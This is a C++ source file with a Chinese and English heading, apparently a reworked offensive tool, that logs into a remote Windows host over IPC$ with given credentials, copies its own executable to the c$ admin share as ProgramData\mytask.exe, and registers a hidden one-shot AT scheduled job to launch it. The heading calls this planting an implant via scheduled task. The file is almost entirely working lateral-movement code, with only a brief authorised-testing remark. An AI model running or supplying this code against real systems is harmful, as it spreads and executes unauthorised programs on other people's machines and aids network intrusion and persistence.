实现：通过 IPC$ 连接远程主机，把本程序复制到目标的 c$ 管理共享，并添加一个远程计划任务（AT 作业）来启动它（即“计划任务种马”）。Implementation: authenticate to a remote host over IPC$, copy this binary to the c$ admin share, and register a remote AT job that launches it.

#pragma comment(lib, "mpr.lib")
#pragma comment(lib,"Netapi32.lib")
#include <windows.h>
#include <lm.h>
#include <tchar.h>
#include <stdio.h>
#include <Winnetwk.h>
#include <string>
#include <lmat.h>

//using namespace std;
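// Print a human-readable description of a Win32/WNet status code to stdout.
//
// `ret` is the status returned by the failing API; `api` names that API in
// the message and defaults to WNetAddConnection2, the only caller in this
// file. The buffer FormatMessage allocates is always released.
//
// Fix: the original called FormatMessageA into a wchar_t* and then printed
// it with %s under wprintf, so ANSI bytes were interpreted as UTF-16 and the
// message came out as garbage. The W variant is used throughout now.
void GetError(DWORD ret, const wchar_t* api = L"WNetAddConnection2") {
	LPWSTR msg = nullptr;
	const DWORD len = FormatMessageW(
		FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
		nullptr, ret, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
		reinterpret_cast<LPWSTR>(&msg), 0, nullptr);
	// FormatMessage can fail (unknown code, no message table); don't pass a
	// null pointer to %s in that case.
	if (len == 0 || msg == nullptr) {
		wprintf(L"%s failed with error: %lu (no description available)\n", api, ret);
		return;
	}
	wprintf(L"%s failed with error: %lu, %s\n", api, ret, msg);
	LocalFree(msg);
}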

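namespace {

// Turn a bare host name or IP into the "\\host" server name that the WNet
// and Net* APIs expect. A value that already starts with "\\" is used as-is,
// so passing "\\host" no longer produces "\\\\host".
std::wstring UncServerName(const wchar_t* host) {
	if (host[0] == L'\\' && host[1] == L'\\') {
		return host;
	}
	std::wstring name(L"\\\\");
	name.append(host);
	return name;
}

// Open an SMB session to `remoteName` ("\\host" for the IPC$ connection, or a
// share) with explicit credentials. `localName` is the drive letter to map,
// or nullptr for a drive-less connection. CONNECT_TEMPORARY keeps the
// connection out of the user's persistent (restored-at-logon) list.
// Returns the WNet status code; NO_ERROR on success.
DWORD ConnectShare(const std::wstring& remoteName, LPWSTR localName,
                   LPCWSTR userName, LPCWSTR password) {
	NETRESOURCEW nr{};  // zero-initialised: dwScope/dwDisplayType/dwUsage/lpComment are not used
	nr.dwType = RESOURCETYPE_ANY;
	nr.lpLocalName = localName;
	nr.lpRemoteName = const_cast<LPWSTR>(remoteName.c_str());
	nr.lpProvider = nullptr;  // let the system choose the network provider
	// Argument order is (resource, PASSWORD, USERNAME, flags) - easy to swap by mistake.
	return WNetAddConnection2W(&nr, password, userName, CONNECT_TEMPORARY);
}

// Convert a NetRemoteTOD answer into the AT_INFO.JobTime the target expects
// (milliseconds after local midnight), pointing one minute past the server's
// current time. The clock reported by NetRemoteTOD is UTC and tod_timezone is
// the server's offset in minutes WEST of UTC, so local = UTC - tod_timezone
// (the same correction the original applied, but on whole hours only).
//
// Fix: the original hour-only arithmetic went negative for servers west of
// UTC and produced 24:00 when the current time was 23:59; the total number of
// minutes is now wrapped into [0, 24h) before conversion.
DWORD_PTR NextMinuteJobTime(const TIME_OF_DAY_INFO& tod) {
	const long minutesPerDay = 24 * 60;
	long localMinutes = static_cast<long>(tod.tod_hours) * 60
	                  + static_cast<long>(tod.tod_mins)
	                  - tod.tod_timezone
	                  + 1;
	localMinutes %= minutesPerDay;
	if (localMinutes < 0) {
		localMinutes += minutesPerDay;
	}
	return static_cast<DWORD_PTR>(localMinutes) * 60 * 1000;
}

// Copy this executable to \\host\c$\ProgramData\mytask.exe and register a
// one-shot, non-interactive AT job on `host` that launches it one minute from
// the server's current local time. Requires an authenticated session to
// `host` to exist already (see ConnectShare). Returns true only if the copy,
// the remote time query and the job registration all succeeded. A file that
// was copied before a later step failed is NOT removed again.
bool DeployAndSchedule(const wchar_t* host) {
	const std::wstring server = UncServerName(host);
	// Destination on the target, reached through the c$ administrative share,
	// e.g. \\192.168.1.152\c$\ProgramData\mytask.exe
	const std::wstring remoteFile = server + L"\\c$\\ProgramData\\mytask.exe";

	// Full path of the running binary. A MAX_PATH-truncated result is rejected
	// instead of silently copying a wrong file name (the original did not check).
	wchar_t localModule[MAX_PATH];
	const DWORD pathLen = GetModuleFileNameW(nullptr, localModule, MAX_PATH);
	if (pathLen == 0 || pathLen >= MAX_PATH) {
		wprintf(L"GetModuleFileName failed (error %lu)\n", GetLastError());
		return false;
	}

	// bFailIfExists == FALSE: an existing mytask.exe on the target is overwritten.
	if (!CopyFileW(localModule, remoteFile.c_str(), FALSE)) {
		wprintf(L"copyfile failed\n");
		wprintf(L"  error %lu\n", GetLastError());
		return false;
	}
	wprintf(L"copyfile successful\n");

	// The job time must be expressed in the TARGET's clock, not ours.
	LPTIME_OF_DAY_INFO tod = nullptr;
	NET_API_STATUS status = NetRemoteTOD(server.c_str(), reinterpret_cast<LPBYTE*>(&tod));
	if (status != NERR_Success || tod == nullptr) {
		wprintf(L"Get remote time failed\n");
		wprintf(L"  status %lu\n", status);
		return false;
	}
	wprintf(L"Get remote time successful\n");

	AT_INFO job{};
	job.JobTime = NextMinuteJobTime(*tod);
	job.DaysOfMonth = 0;             // run once rather than on given days of the month...
	job.DaysOfWeek = 0;              // ...or on given weekdays
	job.Flags = JOB_NONINTERACTIVE;  // no desktop interaction on the target
	wchar_t command[] = L"c:\\ProgramData\\mytask.exe";  // local path as seen by the target
	job.Command = command;
	NetApiBufferFree(tod);  // allocated by NetRemoteTOD; the original leaked it
	tod = nullptr;

	DWORD jobId = 0;
	status = NetScheduleJobAdd(server.c_str(), reinterpret_cast<LPBYTE>(&job), &jobId);
	if (status != NERR_Success) {
		wprintf(L"Job add failed\n");
		wprintf(L"  status %lu\n", status);
		return false;
	}
	wprintf(L"Job add successful\n");
	wprintf(L"  job id %lu\n", jobId);  // needed to remove the job again later
	return true;
}

}  // namespace

// Entry point.
//
//   <prog> <localname> <remotename> <username> <password>
//       map drive <localname> to \\<remotename> and stop
//   <prog> <remotename> <username> <password>
//       connect to \\<remotename>, copy this binary to c$\ProgramData and
//       add an AT job on the target that runs it one minute later
//
// Only the drive-less session of the second form is torn down at exit; a
// mapped drive is the result the caller asked for and is left in place.
//
// Security notes:
//  * The password is taken from the command line, so it is visible to anyone
//    able to read this process's command line; the original additionally
//    echoed it to stdout, which this version no longer does.
//  * Every step leaves artifacts on the target: an authenticated SMB session,
//    a file under c$\ProgramData and a scheduled job. Use only against
//    systems you are authorised to test.
//  * NOTE(review): NetScheduleJobAdd drives the legacy AT scheduler, which
//    current Windows versions may not serve by default - confirm against the
//    target before relying on the job actually running.
//
// Returns 0 on success, 1 on a usage error or when any step failed
// (the original always returned 0).
int wmain(int argc, wchar_t* argv[]) {
	if (argc != 5 && argc != 4) {
		wprintf(L"Usage: %s <localname> <remotename> <username> <password>\n", argv[0]);
		wprintf(L"Usage: %s <remotename> <username> <password>\n", argv[0]);
		return 1;
	}

	const bool mapDrive = (argc == 5);
	LPWSTR localName = mapDrive ? argv[1] : nullptr;
	const wchar_t* host = mapDrive ? argv[2] : argv[1];
	const wchar_t* userName = mapDrive ? argv[3] : argv[2];
	const wchar_t* password = mapDrive ? argv[4] : argv[3];
	const std::wstring remoteName = UncServerName(host);

	// The original indented the parameter dump only in the drive-mapping path;
	// the output format is kept so existing scripts parsing it still work.
	const wchar_t* indent = mapDrive ? L"  " : L"";
	wprintf(L"Calling WNetAddConnection2 with\n");
	if (mapDrive) {
		wprintf(L"%slpLocalName = %s\n", indent, localName);
	}
	wprintf(L"%slpRemoteName = %s\n", indent, remoteName.c_str());
	wprintf(L"%slpUsername = %s\n", indent, userName);
	// The password is deliberately not printed.

	const DWORD connectStatus = ConnectShare(remoteName, localName, userName, password);
	if (connectStatus != NO_ERROR) {
		GetError(connectStatus);
		return 1;
	}
	wprintf(L"Connection added to %s\n", remoteName.c_str());

	int exitCode = 0;
	if (!mapDrive) {
		exitCode = DeployAndSchedule(host) ? 0 : 1;
		// The session was only the transport for the copy and the job; drop it so
		// it does not linger in `net use` for the rest of this logon session
		// (the original never cancelled it).
		WNetCancelConnection2W(remoteName.c_str(), 0, TRUE);
	}
	return exitCode;
}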

参考文章:https://blog.****.net/weixin_34408624/article/details/86248485